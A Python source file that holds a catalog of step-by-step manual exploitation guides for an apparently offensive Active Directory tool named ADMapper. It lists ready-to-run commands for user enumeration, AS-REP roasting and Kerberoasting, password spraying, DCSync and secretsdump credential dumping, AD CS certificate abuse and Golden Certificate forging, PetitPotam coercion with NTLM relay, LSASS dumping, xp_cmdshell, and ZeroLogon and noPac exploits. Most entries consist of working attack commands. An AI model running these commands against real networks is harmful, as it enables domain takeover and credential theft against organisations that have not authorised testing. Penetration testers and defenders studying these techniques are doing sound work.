from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class ManualGuide:
    """BloodHound-style manual exploitation instructions for one technique."""

    key: str
    title: str
    summary: str
    prerequisites: tuple[str, ...] = ()
    manual_steps: tuple[str, ...] = ()
    commands: tuple[str, ...] = ()
    tools: tuple[str, ...] = ()
    mitre_id: str | None = None
    next_steps: tuple[str, ...] = ()
    references: tuple[str, ...] = ()


def _g(
    key: str,
    *,
    title: str,
    summary: str,
    prerequisites: tuple[str, ...] = (),
    manual_steps: tuple[str, ...] = (),
    commands: tuple[str, ...] = (),
    tools: tuple[str, ...] = (),
    mitre_id: str | None = None,
    next_steps: tuple[str, ...] = (),
    references: tuple[str, ...] = (),
) -> ManualGuide:
    return ManualGuide(
        key=key,
        title=title,
        summary=summary,
        prerequisites=prerequisites,
        manual_steps=manual_steps,
        commands=commands,
        tools=tools,
        mitre_id=mitre_id,
        next_steps=next_steps,
        references=references,
    )


MANUAL_GUIDE_CATALOG: dict[str, ManualGuide] = {
    "dns_domain_controllers": _g(
        "dns_domain_controllers",
        title="DNS SRV — Domain controller discovery",
        summary="Locate AD domain controllers via DNS service records before any credential use.",
        prerequisites=("DNS resolution to domain DNS server or internal resolver", "Domain FQDN"),
        manual_steps=(
            "Identify the AD DNS domain (e.g. from internal DNS, DHCP option 15, or email domain).",
            "Query SRV records: _ldap._tcp, _kerberos._tcp, _gc._tcp.",
            "Resolve returned hostnames to IPs (A/AAAA records).",
            "Treat _ldap._tcp targets as primary DC candidates for LDAP/SMB follow-up.",
        ),
        commands=(
            "dig +short SRV _ldap._tcp.dc._msdcs.<DOMAIN>",
            "dig +short SRV _kerberos._tcp.<DOMAIN>",
            "dig +short SRV _gc._tcp.<DOMAIN>",
            "nslookup -type=SRV _ldap._tcp.<DOMAIN>",
        ),
        tools=("dig", "nslookup", "admapper start_unauth"),
        mitre_id="T1018",
        next_steps=("Probe LDAP tcp/389 and SMB tcp/445 on discovered DCs", "Run: enum users"),
    ),
    "ldap_anonymous": _g(
        "ldap_anonymous",
        title="LDAP anonymous bind",
        summary="Query Active Directory via LDAP without credentials when anonymous bind is allowed.",
        prerequisites=(
            "TCP/389 reachable on a domain controller",
            "Anonymous bind enabled (misconfiguration)",
        ),
        manual_steps=(
            "Confirm anonymous bind against the DC RootDSE.",
            "Read defaultNamingContext from RootDSE — this is your LDAP search base.",
            "Enumerate users with an LDAP filter for person objects.",
            "Optionally dump groups, computers, and ACL-readable attributes.",
            "Harvest usernames for password spraying or AS-REP/Kerberoast pre-checks.",
        ),
        commands=(
            "ldapsearch -x -H ldap://<DC_IP> -s base namingcontexts",
            'ldapsearch -x -H ldap://<DC_IP> -b "<BASE_DN>" '
            '"(&(objectClass=user)(objectCategory=person))" sAMAccountName userAccountControl',
            "nxc ldap <DC_IP> -u '' -p '' --users",
        ),
        tools=("ldapsearch", "ldap3", "NetExec (nxc ldap)", "ADMapper enum users"),
        mitre_id="T1087.002",
        next_steps=(
            "enum users",
            "Check AS-REP roastable accounts (no preauth)",
            "Password spray user list",
        ),
        references=("https://attack.mitre.org/techniques/T1087/002/",),
    ),
    "smb_null": _g(
        "smb_null",
        title="SMB null session",
        summary="Authenticate to SMB as anonymous/guest to enumerate domain metadata via RPC pipes.",
        prerequisites=("TCP/445 reachable", "Null session not disabled by GPO (RestrictAnonymous)"),
        manual_steps=(
            "Establish SMB session with empty username and password.",
            "Access SAMR pipe to enumerate domain users and groups.",
            "Optionally use LSARPC for RID cycling when full user list is denied.",
            "Collect usernames and descriptions for credential attacks.",
        ),
        commands=(
            "nxc smb <DC_IP> -u '' -p '' --users",
            "nxc smb <DC_IP> -u '' -p '' --groups",
            "rpcclient -U '' -N <DC_IP> -c enumdomusers",
            "enum4linux -U <DC_IP>",
        ),
        tools=("NetExec", "rpcclient", "enum4linux", "Impacket", "ADMapper enum users"),
        mitre_id="T1021.002",
        next_steps=("enum users (SAMR source)", "Combine with LDAP anonymous results"),
        references=("https://attack.mitre.org/techniques/T1021/002/",),
    ),
    "kerberos_open": _g(
        "kerberos_open",
        title="Kerberos KDC reachable",
        summary="Port 88 open indicates a Kerberos KDC — enables roast and spray attacks once usernames exist.",
        prerequisites=("TCP/88 reachable", "List of valid usernames"),
        manual_steps=(
            "Confirm KDC with SRV _kerberos._tcp or open port 88.",
            "Request AS-REP for users without preauth (AS-REP roasting).",
            "Request TGS for users with SPNs (Kerberoasting).",
            "Attempt Kerberos or SMB password spraying with lockout awareness.",
        ),
        commands=(
            "kerbrute userenum -d <DOMAIN> --dc <DC_IP> users.txt",
            "GetNPUsers.py <DOMAIN>/ -no-pass -usersfile users.txt",
            "GetUserSPNs.py <DOMAIN>/user:pass -dc-ip <DC_IP> -request",
        ),
        tools=("Impacket", "kerbrute", "hashcat", "ADMapper asreproast / kerberoast"),
        mitre_id="T1558",
        next_steps=("enum users", "asreproast", "kerberoast"),
    ),
    "samr_enumeration": _g(
        "samr_enumeration",
        title="SAMR user enumeration (SMB null)",
        summary="List domain users via the Security Account Manager Remote protocol over a null SMB session.",
        prerequisites=("SMB null session on a domain controller", "SAMR pipe accessible"),
        manual_steps=(
            "Connect SMB with -U '' -N (null session).",
            "Bind to SAMR and open the built-in domain handle.",
            "Call SamrEnumerateUsersInDomain to list RIDs and account names.",
            "For each RID, query SamrQueryInformationUser for descriptions and flags.",
            "Merge results with LDAP enumeration; SAMR often finds users LDAP anon misses.",
        ),
        commands=(
            "nxc smb <DC_IP> -u '' -p '' --users",
            "rpcclient -U '' -N <DC_IP> -c enumdomusers",
            "samrdump.py <DC_IP>",
        ),
        tools=("NetExec", "rpcclient", "Impacket samrdump", "ADMapper enum users"),
        mitre_id="T1087.002",
        next_steps=(
            "rid_cycling if user count is low",
            "asreproast / kerberoast on discovered users",
        ),
    ),
    "ldap_user_enum": _g(
        "ldap_user_enum",
        title="LDAP user enumeration (authenticated or anonymous)",
        summary="Pull the canonical user list from AD LDAP including UAC and SPN attributes.",
        prerequisites=(
            "LDAP bind (anonymous or credentialed)",
            "defaultNamingContext from RootDSE",
        ),
        manual_steps=(
            "Bind to LDAP on tcp/389 (or 636 with LDAPS).",
            "Search base: defaultNamingContext from RootDSE.",
            "Filter: (&(objectClass=user)(objectCategory=person))",
            "Attributes: sAMAccountName, userAccountControl, servicePrincipalName, description, memberOf.",
            "Flag DONT_REQ_PREAUTH (0x400000) → AS-REP roastable.",
            "Non-empty servicePrincipalName on user account → Kerberoast candidate.",
        ),
        commands=(
            'ldapsearch -x -H ldap://<DC_IP> -b "<BASE_DN>" '
            '"(&(objectClass=user)(objectCategory=person))" '
            "sAMAccountName userAccountControl servicePrincipalName description",
            "nxc ldap <DC_IP> -u <USER> -p <PASS> --users",
        ),
        tools=("ldapsearch", "ldap3", "NetExec", "ADMapper enum users"),
        mitre_id="T1087.002",
        next_steps=("asreproast for DONT_REQ_PREAUTH users", "kerberoast for SPN users"),
    ),
    "rid_cycling": _g(
        "rid_cycling",
        title="RID cycling (LSARPC / brute-force RIDs)",
        summary="Discover usernames by brute-forcing Relative Identifiers when full enumeration is blocked.",
        prerequisites=(
            "SMB guest/null or low-privilege session",
            "SAMR full enumeration denied or returned empty",
        ),
        manual_steps=(
            "Establish SMB session (guest or null where allowed).",
            "Use LSARPC or SAMR lookup to resolve RIDs to names (e.g. 500–10500).",
            "Built-in RIDs: 500 Administrator, 501 Guest, 502 krbtgt.",
            "Collect discovered names into users.txt for spray/roast.",
            "RID cycling is noisier and slower — use when SAMR/LDAP enum fails.",
        ),
        commands=(
            "nxc smb <DC_IP> -u guest -p '' --rid-brute 500-10000",
            "lookupsid.py <DOMAIN>/guest@<DC_IP>",
            "crackmapexec smb <DC_IP> -u guest -p '' --rid-brute",
        ),
        tools=("NetExec", "Impacket lookupsid", "ADMapper enum users"),
        mitre_id="T1087.002",
        next_steps=("Merge RID results into user list", "password spray with lockout policy check"),
    ),
    "asreproast": _g(
        "asreproast",
        title="AS-REP roasting",
        summary="Obtain crackable Kerberos AS-REP hashes for accounts that do not require pre-authentication.",
        prerequisites=("Valid username list", "Account has DONT_REQ_PREAUTH (UAC bit 0x400000)"),
        manual_steps=(
            "Identify users with userAccountControl & 0x400000 (DONT_REQ_PREAUTH).",
            "Request AS-REP without pre-authentication for each user.",
            "Save hash in hashcat mode 18200 ($krb5asrep$23$...).",
            "Crack offline with hashcat/john and a strong wordlist.",
            "Use recovered password for authenticated enumeration.",
        ),
        commands=(
            "GetNPUsers.py <DOMAIN>/ -no-pass -usersfile users.txt -dc-ip <DC_IP>",
            "hashcat -m 18200 asrep_hashes.txt wordlist.txt",
        ),
        tools=("Impacket GetNPUsers", "hashcat", "ADMapper asreproast"),
        mitre_id="T1558.004",
        next_steps=("creds add with recovered password", "start_auth"),
    ),
    "kerberoast": _g(
        "kerberoast",
        title="Kerberoasting",
        summary="Request service tickets for accounts with SPNs and crack the TGS offline.",
        prerequisites=(
            "Any valid domain credential OR roastable preauth bypass",
            "Target users with servicePrincipalName set",
        ),
        manual_steps=(
            "Find users with SPN set (not krbtgt, typically not machine accounts).",
            "Request TGS for each SPN using your credentials (or without for edge cases).",
            "Export hashcat mode 13100 ($krb5tgs$23$...).",
            "Crack offline — service account passwords are often weak.",
            "Use recovered creds; service accounts may have elevated rights.",
        ),
        commands=(
            "GetUserSPNs.py <DOMAIN>/user:pass -dc-ip <DC_IP> -request",
            "hashcat -m 13100 tgs_hashes.txt wordlist.txt",
        ),
        tools=("Impacket GetUserSPNs", "hashcat", "ADMapper kerberoast"),
        mitre_id="T1558.003",
        next_steps=("creds add", "BloodHound / ACL path analysis with new access"),
    ),
    "passwordspray": _g(
        "passwordspray",
        title="Password spraying",
        summary=("Try one password against many domain users while respecting lockout policy."),
        prerequisites=(
            "Username list from enum users",
            "Domain lockout policy (lockoutThreshold, badPwdCount per user)",
            "Single candidate password (seasonal or company pattern)",
        ),
        manual_steps=(
            "Query domain lockout policy via LDAP on the domain NC head.",
            "Check badPwdCount / lockoutTime — skip users near the threshold.",
            "Never repeat the same password in a spray window; log attempts.",
            "Spray one password across all eligible users (kerbrute or LDAP bind).",
            "On success, verify cred and pivot to authenticated enumeration.",
        ),
        commands=(
            "ldapsearch -x -H ldap://<DC> -b <BASE_DN> "
            "(objectClass=domain) lockoutThreshold lockoutDuration",
            "kerbrute passwordspray -d <DOMAIN> --dc <DC_IP> users.txt 'Winter2026!'",
            "nxc smb <DC_IP> -u users.txt -p 'Winter2026!' --continue-on-success",
        ),
        tools=("kerbrute", "NetExec", "ldap3", "ADMapper spray"),
        mitre_id="T1110.003",
        next_steps=("creds list", "start_auth", "spray variations for next pattern"),
    ),
    "creds_verify": _g(
        "creds_verify",
        title="Credential verification",
        summary="Confirm recovered credentials work before pivoting to authenticated enumeration.",
        prerequisites=("Domain controller IP", "Username + password or NTLM hash"),
        manual_steps=(
            "Test LDAP bind with user@domain and password.",
            "Test SMB authentication against the DC (nxc or crackmapexec).",
            "Optionally request a Kerberos TGT with impacket-getTGT.",
            "Mark valid creds and avoid re-spraying/roasting the same account blindly.",
        ),
        commands=(
            "nxc smb <DC_IP> -u user -p password",
            "ldapwhoami -x -H ldap://<DC_IP> -D user@<DOMAIN> -w password",
            "getTGT.py <DOMAIN>/user:password",
        ),
        tools=("NetExec", "ldapwhoami", "Impacket getTGT", "ADMapper creds verify"),
        mitre_id="T1078",
        next_steps=("start_auth", "BloodHound collection"),
    ),
    "start_auth": _g(
        "start_auth",
        title="Start authenticated workflow",
        summary=(
            "Verify a workspace credential, mark the user as owned, and seed the attack graph."
        ),
        prerequisites=("Valid credential in workspace", "Domain and DC inventory"),
        manual_steps=(
            "Pick the best verified credential for the engagement.",
            "Confirm LDAP/SMB access to the domain controller.",
            "Record the user as compromised (owned) in your graph.",
            "Run authenticated LDAP/SMB enumeration for groups, ACLs, and shares.",
            "Feed results into BloodHound or ADMapper graph pathing.",
        ),
        commands=(
            "nxc ldap <DC_IP> -u user -p password --groups",
            "bloodhound-python -u user -p password -d <DOMAIN> -ns <DC_IP> -c All",
        ),
        tools=("NetExec", "bloodhound-python", "ADMapper start_auth"),
        mitre_id="T1078",
        next_steps=("enum auth / start_auth", "paths / BloodHound analysis"),
    ),
    "auth_enum": _g(
        "auth_enum",
        title="Authenticated enumeration",
        summary="With valid credentials, dump LDAP inventory, SMB shares, GPP, trusts, and AD CS hints.",
        prerequisites=("Valid credential (creds verify)", "Domain + DC in workspace"),
        manual_steps=(
            "Bind LDAP with user@domain credentials.",
            "Enumerate users, groups, computers, OUs, GPOs.",
            "Hunt delegations (unconstrained, constrained, RBCD).",
            "List SMB shares; parse SYSVOL for GPP cpassword.",
            "Export BloodHound-compatible JSON for path analysis.",
        ),
        commands=(
            "nxc ldap <DC> -u user -p pass --users --groups --computers",
            "bloodhound-python -u user -p pass -d <DOMAIN> -c All",
            "GetGPPPassword.py <DOMAIN>/user:pass -dc-ip <DC>",
        ),
        tools=("ldap3", "Impacket", "NetExec", "bloodhound-python", "ADMapper start_auth"),
        mitre_id="T1087.002",
        next_steps=("BloodHound import", "paths", "ACL abuse — Phase 10"),
    ),
    "attack_paths": _g(
        "attack_paths",
        title="Attack path analysis",
        summary="Find exploitable routes from owned principals to high-value groups like Domain Admins.",
        prerequisites=(
            "Owned user in workspace (start_auth)",
            "auth_inventory.json with group memberships",
        ),
        manual_steps=(
            "Mark compromised users as owned.",
            "Import or build group membership edges (memberOf).",
            "Run graph BFS from owned nodes to Domain Admins / Enterprise Admins.",
            "Review quick wins (GPP, AS-REP, spray hits) before deep ACL hunting.",
            "Use BloodHound for ACL edges ADMapper has not collected yet.",
        ),
        commands=(
            "ADMapper paths",
            "ADMapper paths show path-001",
            "bloodhound-python ... -c ACL",
        ),
        tools=("ADMapper paths", "BloodHound CE", "graph.json"),
        mitre_id="T1068",
        next_steps=("paths show <id>", "acls", "guide acl_abuse"),
    ),
    "acl_abuse": _g(
        "acl_abuse",
        title="ACL abuse",
        summary="Exploit Active Directory ACEs (GenericAll, WriteDACL, ForceChangePassword, DCSync, etc.).",
        prerequisites=(
            "Valid domain credential (preferably owned user from start_auth)",
            "auth_inventory.json for target selection",
            "impacket installed (pip install admapper[recon])",
        ),
        manual_steps=(
            "Run ADMapper acls to enumerate exploitable ACEs for owned principals.",
            "Prioritize GenericAll / WriteDACL / AddMember on high-value groups.",
            "ForceChangePassword → creds add → start_auth as target user.",
            "WriteDACL → grant GenericAll → repeat abuse chain.",
            "DCSync on domain object → secretsdump / lsadump::dcsync.",
            "ReadLAPSPassword / ReadGMSAPassword → lateral movement creds.",
            "WriteSPN → targeted Kerberoast → crack → start_auth.",
        ),
        commands=(
            "ADMapper acls",
            "ADMapper acls show acl-001",
            "dacledit.py -action read -target <dn>",
            "secretsdump.py <DOMAIN>/user:pass@<DC>",
        ),
        tools=("ADMapper acls", "Impacket dacledit/owneredit", "bloodyAD", "NetExec", "BloodHound"),
        mitre_id="T1098",
        next_steps=("acls show <id>", "paths", "creds add + start_auth"),
    ),
    "kerberos_adv": _g(
        "kerberos_adv",
        title="Advanced Kerberos attacks",
        summary="Delegation abuse, shadow credentials, backup operators, and timeroasting.",
        prerequisites=(
            "start_auth inventory with delegations",
            "Optional: acls for shadow cred / RBCD write paths",
            "Owned user marked in workspace",
        ),
        manual_steps=(
            "Run ADMapper kerberos to map delegation + ACL-derived Kerberos ops.",
            "Unconstrained: coerce authentication to delegated host, capture TGT.",
            "Constrained / PT: getST.py S4U2Self + S4U2Proxy to allowed SPNs.",
            "RBCD: rbcd.py write AllowedToAct, then getST impersonation.",
            "Shadow creds: pywhisker add KeyCredentialLink, certipy auth.",
            "Backup Operators: diskshadow on DC, dump SAM/SYSTEM/SECURITY.",
        ),
        commands=(
            "ADMapper kerberos",
            "ADMapper kerberos show krb-001",
            "getST.py -spn <spn> -impersonate administrator ...",
            "pywhisker --target <user> -a add",
        ),
        tools=("ADMapper kerberos", "Impacket getST/rbcd", "pywhisker", "certipy"),
        mitre_id="T1558",
        next_steps=("timeroast", "paths", "guide timeroasting"),
    ),
    "timeroasting": _g(
        "timeroasting",
        title="Timeroasting",
        summary="Offline crack machine-account AES keys using pwdLastSet-derived material.",
        prerequisites=(
            "Authenticated LDAP inventory (computers)",
            "Domain credential",
            "External timeroast tool or nxc --timeroast",
        ),
        manual_steps=(
            "Run ADMapper timeroast to export machine-account candidates.",
            "Use timeroast.py or nxc ldap --timeroast against the DC.",
            "Crack recovered hashes with hashcat mode 19900 (or tool-specific mode).",
            "Use recovered machine creds for constrained delegation / RBCD chains.",
        ),
        commands=(
            "ADMapper timeroast",
            "timeroast.py -d <DOMAIN> -u user -p pass --dc-ip <DC>",
            "hashcat -m 19900 timeroast_hashes.txt wordlist.txt",
        ),
        tools=("ADMapper timeroast", "timeroast.py", "NetExec", "hashcat"),
        mitre_id="T1558.003",
        next_steps=("kerberos", "start_auth with cracked machine cred"),
    ),
    "adcs_esc": _g(
        "adcs_esc",
        title="AD CS ESC attacks",
        summary="Abuse misconfigured certificate templates and CAs using the current ESC catalog.",
        prerequisites=(
            "AD CS installed (pKIEnrollmentService in LDAP)",
            "Valid domain credential",
            "pip install certipy-ad (external) for exploitation",
        ),
        manual_steps=(
            "Run ADMapper adcs to enumerate templates and flag ESC conditions.",
            "ESC1: request cert with alternate UPN/SAN as Domain Admin.",
            "ESC6: abuse EDITF_ATTRIBUTESUBJECTALTNAME2 on CA policy.",
            "ESC8: coerce + NTLM relay to http://<CA>/certsrv/certfnsh.asp.",
            "Use certipy auth with issued PFX for domain authentication.",
            "Chain to DCSync or start_auth with recovered principal.",
        ),
        commands=(
            "ADMapper adcs",
            "ADMapper adcs show adcs-001",
            "certipy find -u user@<DOMAIN> -p pass -dc-ip <DC>",
            "certipy req -ca <CA> -template <Template> -upn administrator@<DOMAIN>",
        ),
        tools=("ADMapper adcs", "Certipy", "ntlmrelayx", "Impacket"),
        mitre_id="T1649",
        next_steps=("adcs show <id>", "creds add", "start_auth"),
    ),
    "golden_cert": _g(
        "golden_cert",
        title="Golden Certificate",
        summary="Forge Kerberos TGTs using stolen CA private key (NTAUTH).",
        prerequisites=(
            "CA backup access (ESC7, compromised CA host, or offline CA key)",
            "certipy-ad installed",
        ),
        manual_steps=(
            "Backup CA cert + key: certipy ca -backup -ca <CA>.",
            "Forge certificate for target user: certipy forge -ca-pfx ca.pfx.",
            "Request TGT with forged cert: certipy auth -pfx forged.pfx.",
            "Use TGT for DCSync or lateral movement.",
        ),
        commands=(
            "certipy ca -backup -ca corp-DC01-CA",
            "certipy forge -ca-pfx ca.pfx -upn administrator@<DOMAIN>",
            "certipy auth -pfx administrator.pfx -dc-ip <DC>",
        ),
        tools=("Certipy", "ADMapper adcs"),
        mitre_id="T1649",
        next_steps=("secretsdump.py", "start_auth"),
    ),
    "coercion": _g(
        "coercion",
        title="Coerced authentication",
        summary="Force a Windows host (often a DC) to authenticate to an attacker-controlled listener.",
        prerequisites=(
            "Network path to target RPC (PetitPotam, PrinterBug, etc.)",
            "Listener: ntlmrelayx / Responder on attacker IP",
            "Optional: unconstrained delegation host to capture TGT",
        ),
        manual_steps=(
            "Run ADMapper coerce to map DCs, listeners, and techniques.",
            "Start ntlmrelayx.py with appropriate target (ldap/http/smb).",
            "Trigger coercion: PetitPotam, printerbug, or coercer.py.",
            "If unconstrained delegation listener exists, capture TGT from delegated host.",
            "Otherwise relay hash to LDAP (RBCD) or AD CS (ESC8).",
        ),
        commands=(
            "ADMapper coerce",
            "ADMapper coerce show coerce-001",
            "ntlmrelayx.py -t ldap://<DC> --delegate-access",
            "PetitPotam.py -d <DOMAIN> -u user -p pass <listener>",
        ),
        tools=("ADMapper coerce", "Impacket ntlmrelayx", "PetitPotam", "coercer"),
        mitre_id="T1187",
        next_steps=("guide ntlm_relay", "start_auth"),
    ),
    "ntlm_relay": _g(
        "ntlm_relay",
        title="NTLM relay attacks",
        summary="Relay coerced or captured NTLM authentication to LDAP, SMB, or AD CS.",
        prerequisites=(
            "Coerced machine or user NTLM auth to attacker listener",
            "SMB signing not required on relay target (or NTLMv1 downgrade)",
            "LDAP channel binding disabled for LDAP relay",
        ),
        manual_steps=(
            "LDAP relay: ntlmrelayx.py -t ldap://<DC> --delegate-access --escalate-user svc$.",
            "Shadow creds relay: ntlmrelayx.py -t ldap://<DC> --shadow-credentials --shadow-target Administrator.",
            "AD CS relay (ESC8): ntlmrelayx.py -t http://<CA>/certsrv/certfnsh.asp --adcs.",
            "Chain PetitPotam → relay → RBCD → getST for DA impersonation.",
        ),
        commands=(
            "ntlmrelayx.py -t ldap://<DC> --delegate-access --escalate-user attacker$",
            "ntlmrelayx.py -t http://<CA>/certsrv/certfnsh.asp --adcs --template User",
            "getST.py -spn cifs/<target> -impersonate administrator ...",
        ),
        tools=("ntlmrelayx", "Impacket", "Certipy", "ADMapper coerce"),
        mitre_id="T1557.001",
        next_steps=("kerberos", "paths", "start_auth"),
    ),
    "postex_local": _g(
        "postex_local",
        title="Local post-exploitation",
        summary="Credential dumping, lateral movement, and share looting after domain access.",
        prerequisites=(
            "Owned credential or local shell on Windows host",
            "start_auth inventory (computers, shares)",
            "Optional: acls/paths for DCSync",
        ),
        manual_steps=(
            "Run ADMapper postex for lateral targets and dump opportunities.",
            "AdminTo: wmiexec/smbexec/evil-winrm to remote computers.",
            "On compromised host: LSASS dump → pypykatz/mimikatz.",
            "SAM + SYSTEM hives if no LSASS access but have SYSTEM.",
            "DCSync with secretsdump when ACL/path allows.",
            "Loot SYSVOL/NETLOGON and writable shares for creds.",
            "DPAPI / RDP saved creds for further lateral movement.",
        ),
        commands=(
            "ADMapper postex",
            "ADMapper postex show postex-001",
            "secretsdump.py <DOMAIN>/user:pass@<DC> -just-dc",
            "wmiexec.py <DOMAIN>/user:pass@<host>",
            "nxc smb <host> -u user -p pass --shares",
        ),
        tools=("ADMapper postex", "Impacket", "NetExec", "mimikatz", "pypykatz"),
        mitre_id="T1003",
        next_steps=("creds add", "start_auth", "paths"),
    ),
    "wsus_esc": _g(
        "wsus_esc",
        title="WSUS spoofing & AD CS certificate chain",
        summary="Abuse WSUS role + restricted certificate templates toward Domain Admin.",
        prerequisites=(
            "Owned credential (e.g. after DLL hijack lateral)",
            "AD CS enumerated (admapper adcs)",
            "Template enrollment or ESC4 for owned principal",
            "WSUSTemp share on DC (optional indicator)",
        ),
        manual_steps=(
            "Own the task runner account via DLL hijacking.",
            "Task owner has enroll permissions on a vulnerable cert template (Server Authentication EKU only).",
            "Request cert: certipy req … -template <template> -dns <wsus_fqdn> (no certipy auth — no Client Auth).",
            "Use issued cert with pywsus / SharpWSUS to spoof WSUS updates toward Domain Admin.",
        ),
        commands=(
            "ADMapper postex run --op postex-010 --arch x86",
            "ADMapper escalate",
            "ADMapper wsus show wsus-004",
            "certipy req -u <user>@<domain> -hashes :<NTLM> -ca <ca> -template <template> -dns <wsus_fqdn>",
            "python3 pywsus.py -s <wsus_host> publish ...",
        ),
        tools=("ADMapper wsus", "Certipy", "pywsus", "SharpWSUS"),
        mitre_id="T1195.002",
        next_steps=("chain show chain-001", "creds add", "start_auth"),
    ),
    "attack_chain": _g(
        "attack_chain",
        title="Multi-step attack chains",
        summary="Cross-module paths with prerequisite gates (postex → AD CS → WSUS → DA).",
        prerequisites=(
            "Workspace with postex_ops.json, adcs_findings.json",
            "Owned users updated after each successful step",
        ),
        manual_steps=(
            "Run admapper chain to see ready steps and next commands.",
            "Each step lists prerequisites_met — only execute when ready.",
            "After DLL hijack shell, follow-on analysis runs automatically.",
            "Re-run adcs + wsus + chain after gaining new owned principal.",
        ),
        commands=(
            "ADMapper chain",
            "ADMapper chain show chain-001",
            "ADMapper postex run --op postex-010 -w <workspace>",
            "ADMapper adcs -w <workspace>",
            "ADMapper wsus -w <workspace>",
        ),
        tools=("ADMapper chain", "ADMapper postex", "Certipy"),
        mitre_id="T1649",
        next_steps=("chain show <id>", "wsus show <id>", "adcs show <id>"),
    ),
    "escalate": _g(
        "escalate",
        title="User-by-user escalation (BloodHound-style)",
        summary="Operate from one pivot user at a time; show the single best next hop.",
        prerequisites=(
            "At least one owned user (start_auth or escalate mark)",
            "Workspace artefacts: acls, postex, adcs, paths (escalate refresh)",
        ),
        manual_steps=(
            "Run escalate to see outbound edges from the current pivot user.",
            "Mark each newly compromised user: escalate mark <user>.",
            "After mark, run escalate refresh to re-enumerate ACLs/AD CS as that identity.",
            "Execute only the NEXT recommended step — then mark the new user and repeat.",
            "A vulnerable cert template (Server Auth) can lead to WSUS takeover and Domain Admin.",
        ),
        commands=(
            "ADMapper escalate",
            "ADMapper escalate pivot <user>",
            "ADMapper escalate mark <user>",
            "ADMapper escalate refresh",
        ),
        tools=("ADMapper escalate", "BloodHound CE (visual graph)", "Certipy"),
        mitre_id="T1078",
        next_steps=("escalate refresh", "acls show <id>", "adcs show <id>"),
    ),
    "mssql_lateral": _g(
        "mssql_lateral",
        title="MSSQL lateral movement & privilege escalation",
        summary="SQL access, impersonation, linked servers, trustworthy DBs, xp_cmdshell.",
        prerequisites=(
            "Owned domain credential (password or hash)",
            "MSSQL port 1433 open or MSSQLSvc SPN in inventory",
            "Optional: impacket for live enum (mssqlclient.py)",
        ),
        manual_steps=(
            "Run ADMapper mssql to discover instances and enumerate with owned creds.",
            "sql_access: mssqlclient.py or nxc mssql with Windows auth.",
            "sql_admin: confirm sysadmin — enables xp_cmdshell and full control.",
            "impersonate: nxc mssql --impersonate dbo or EXECUTE AS LOGIN.",
            "linked_server: SELECT * FROM sys.servers; hop with EXEC AT / OPENQUERY.",
            "trustworthy: TRUSTWORTHY ON + db_owner → EXECUTE AS OWNER → sysadmin.",
            "xp_cmdshell: EXEC xp_cmdshell or nxc mssql -x for OS command execution.",
        ),
        commands=(
            "ADMapper mssql",
            "ADMapper mssql show mssql-001",
            "mssqlclient.py <DOMAIN>/user:pass@<host> -windows-auth",
            "nxc mssql <host> -u user -p pass --impersonate dbo",
            "SELECT name FROM sys.servers WHERE is_linked = 1;",
            "EXEC xp_cmdshell 'whoami';",
        ),
        tools=("ADMapper mssql", "Impacket mssqlclient", "NetExec", "PowerUpSQL"),
        mitre_id="T1021",
        next_steps=("postex", "start_auth", "creds add"),
    ),
    "cves_exploit": _g(
        "cves_exploit",
        title="CVE exploitation (noPac, ZeroLogon, PrintNightmare, EternalBlue)",
        summary="Detect legacy/patch gaps; exploit only with explicit confirmation.",
        prerequisites=(
            "start_auth inventory with operatingSystem on computers",
            "start_unauth hosts with DC flags and port 445",
            "Owned credential for LDAP MAQ / noPac prereq checks",
        ),
        manual_steps=(
            "Run ADMapper cves for CVE catalog on DCs and workstations.",
            "noPac: cves exploit nopac → verify MAQ > 0, then nopac.py / sam-the-admin.py.",
            "ZeroLogon: cves exploit zerologon <DC> — requires DANGER confirm.",
            "PrintNightmare: rpcdump/nxc spooler module on Server hosts.",
            "EternalBlue: nmap smb-vuln-ms17-010 on Windows 7 / 2008 R2 targets.",
            "Restore DC from backup if ZeroLogon exploit changes machine password.",
        ),
        commands=(
            "ADMapper cves",
            "ADMapper cves show cve-001",
            "ADMapper cves exploit nopac",
            "ADMapper cves exploit zerologon dc01.<DOMAIN>",
            "nmap --script smb-vuln-ms17-010 -p445 <host>",
        ),
        tools=("ADMapper cves", "Impacket", "NetExec", "nmap", "nopac.py"),
        mitre_id="T1210",
        next_steps=("postex", "secretsdump", "start_auth"),
    ),
}


def get_manual_guide(key: str) -> ManualGuide | None:
    return MANUAL_GUIDE_CATALOG.get(key)
